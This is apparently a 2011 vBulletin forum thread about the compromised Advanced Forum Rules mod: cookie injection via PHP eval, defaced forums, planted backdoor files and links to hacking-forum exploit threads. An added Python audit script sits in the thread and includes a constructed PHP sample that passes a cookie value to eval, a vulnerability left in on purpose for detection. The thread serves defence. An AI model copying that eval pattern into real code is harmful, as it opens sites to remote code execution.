I know for a fact that lots of hackers or geeks try to infiltrate anything they can for pleasure, I get so many deny/block IP's report of failed login in my VPS/WHM that it's nuts!!!! A good firewall and well adjusted server security is always the key to peace and tranquility.....as long as it works lolll ;)

Cheers

AusPhotography
05-16-2011, 03:02 AM
https://vborg.vbsupport.ru/showpost.php?p=2195551&postcount=53

I spent an hour on the weekend having a look at the plugin code.
I found an issue with the cookie handling because of the use of an eval function.

The first patch fixed the SQL injection but not cookie injection.
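
AusPhotography's posts of 05-14 and 05-16 above describe cookie content reaching PHP's eval. As an added example (not the mod's code and not from the thread), this Python heuristic audits plugin source for eval() calls whose argument derives from request input, while leaving alone the template-rendering eval that vBulletin 3.x-style code uses routinely. The PHP sample, the cookie names and the function names are constructed.

```python
import re

# Request-controlled PHP superglobals; the posts above name cookies.
SOURCE = re.compile(r"\$_(?:COOKIE|REQUEST|GET|POST)\b")
VAR = re.compile(r"\$[A-Za-z_]\w*")
SUBSCRIPT = r"(?:\[[^\]]*\])*"
# "$name = expr;" or "$name .= expr;"; "==" and "=>" are excluded.
ASSIGN = re.compile(
    r"(\$[A-Za-z_]\w*)" + SUBSCRIPT + r"\s*(\.?=)(?![=>])\s*([^;]+);")
EVAL = re.compile(r"\beval\s*\((.*)\)\s*;")
# A lone integer conversion of one variable cannot carry PHP code.
NUMERIC = re.compile(
    r"\s*(?:\(int\)\s*\$\w+" + SUBSCRIPT
    + r"|intval\s*\(\s*\$\w+" + SUBSCRIPT + r"\s*\))\s*")
# Single-quoted PHP literals are not interpolated, so a "$x" inside one
# does not place the value of $x into the evaluated string.
SQ_LITERAL = re.compile(r"'(?:\\.|[^'\\])*'")


def audit_php(code):
    """Flag eval() calls fed by request input (line-based heuristic that
    follows direct assignments only, not function calls or includes)."""
    tainted, findings = set(), []
    for lineno, line in enumerate(code.splitlines(), 1):
        for var, op, rhs in ASSIGN.findall(line):
            dirty = bool(SOURCE.search(rhs)) or bool(
                tainted & set(VAR.findall(rhs)))
            if dirty and not NUMERIC.fullmatch(rhs):
                tainted.add(var)
            elif op == "=":  # plain reassignment from clean data
                tainted.discard(var)
        for arg in EVAL.findall(line):
            arg = SQ_LITERAL.sub("''", arg)
            via = sorted(v for v in set(VAR.findall(arg))
                         if v in tainted or SOURCE.fullmatch(v))
            if via:
                findings.append({"line": lineno, "via": via,
                                 "code": line.strip()})
    return findings


# Constructed PHP for illustration; cookie names are hypothetical.
SAMPLE_PLUGIN = r'''<?php
// Template rendering: the routine use of eval in vBulletin 3.x-style code.
eval('$navbar = "' . fetch_template('navbar') . '";');
// Cookie value reaches eval through two local variables.
$state = $_COOKIE['bb_rules_state'];
$check = 'return ' . $state . ';';
$ok = eval($check);
// Same cookie family, but converted to an integer first.
$page = intval($_COOKIE['bb_rules_page']);
eval('$offset = ' . $page . ' * 20;');
'''

if __name__ == "__main__":
    for finding in audit_php(SAMPLE_PLUGIN):
        print(finding["line"], finding["via"], finding["code"])
```

Anything the audit flags is better replaced with a strict parse of the cookie value (integer cast, allow-list, or a signed token) than with filtering before eval.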

RCKSTR
05-16-2011, 10:43 PM
NVM. figured it out

fxwoody
05-17-2011, 07:20 AM
NVM. figured it out

https://vborg.vbsupport.ru/showpost.php?p=2195551&postcount=53

I spent an hour on the weekend having a look at the plugin code.
I found an issue with the cookie handling because of the use of an eval function.

The first patch fixed the SQL injection but not cookie injection.


Any info that you could share with us regarding the bug that we could fix in the script???

It could help everyone here ;)

madshark
05-19-2011, 10:19 AM
Well Valter's fixed it again. Hopefully that's the end of holes for this one and the poor man being hounded down.

preemz10314
05-20-2011, 12:58 PM
I never once used this hack and my forum was hacked twice, once someone using some sort of iframe, and this last time someone edited forum.php to simply say "Xuplena"...

Not sure what is going on, my PC is clean, and I have since added extra security against SQL injections. And I never once used Advanced Forum Rules.

There is also word around hacking forums that there is an exploit out that affects 4.x.x. - 4.1.3

It is confirmed that there is a very new exploit out there. be careful /

Smitty
05-20-2011, 01:15 PM
I never once used this hack and my forum was hacked twice, once someone using some sort of iframe, and this last time someone edited forum.php to simply say "Xuplena"... <snip>
That sure changes the game... (bold emphasis mine)

--------------- Added 1305900973 at 1305900973 ---------------

<snip> It is confirmed that there is a very new exploit out there. be careful /
Where is it confirmed?

Zachery
05-20-2011, 01:35 PM
I never once used this hack and my forum was hacked twice, once someone using some sort of iframe, and this last time someone edited forum.php to simply say "Xuplena"...

Not sure what is going on, my PC is clean, and I have since added extra security against SQL injections. And I never once used Advanced Forum Rules.

There is also word around hacking forums that there is an exploit out that affects 4.x.x. - 4.1.3

It is confirmed that there is a very new exploit out there. be careful /
Please don't go around posting FUD. If you do not have a link to an exploit report, chances are there isn't one in the wild.

Delphiprogrammi
05-20-2011, 02:51 PM
hi,

hmmmm people give Valter a break. Ok I wasn't using that mod with a security hole and I can understand the frustration and anger you feel when your site is hacked but this coder is human and humans regardless of their amount of knowledge do make mistakes

the one (and only for that matter) 100% secure code is the one a human never wrote

I can't stand the bashing at the mod author, stop it. To me he is a respected coder. I mean I don't know him but it's just plain bad to go and criticize all of his work just because of one bad one

preemz10314
05-20-2011, 06:23 PM
Please don't go around posting FUD. If you do not have a link to an exploit report, chances are there isn't one in the wild.

Check it out and confirm.

*you need to sign up to view their forums*

I am not spreading spam. But the vb team needs to verify this. This is the latest exploit that is going around. Take a look at the date on this thread & post. It is very recent...like I said, I am no hacker or exploiter nor have i tested it out. But it is something to take a look at...I think there is some credibility to this one.

http://www.hackforums.net/showthread.php?tid=1303176&page=11

http://www.hackforums.net/showthread.php?tid=1230802&page=2

Disasterpiece
05-20-2011, 06:37 PM
This thread is actually about the recent exploit from the AFR mod. If you have general vb exploits, I suggest to send a PM to an administrator.

preemz10314
05-20-2011, 06:59 PM
Yea sorry. I did.

Zachery
05-20-2011, 09:24 PM
FUD is not spam, FUD is fear uncertainty and doubt.

Please send the full exploit information to sales@vbulletin.com

vijayninel
05-20-2011, 11:38 PM
This thread is actually about the recent exploit from the AFR mod.

So it's not any new exploit as such.

jimsflies
05-23-2011, 12:28 AM
How do you go about tracking down the add-on that was the problem? I got rehacked tonight by Team Animus and had also upgraded my advanced forum rules mod earlier this month after the first time.

Paul M
05-23-2011, 01:01 AM
AFR was updated again a few days ago, did you install that ?

jimsflies
05-23-2011, 01:27 AM
No it wasn't...I realized that after posting here and back tracking to find the cause..found snoopytas post about the cookie vulnerability. It's updated now though. Hopefully this time I can put this behind me...

--------------- Added 1306166227 at 1306166227 ---------------

Also found that they not only added vba.php to the includes folder, they also added it to includes/xml/includes as well as a file called include_bbs.php to both of those directories as well.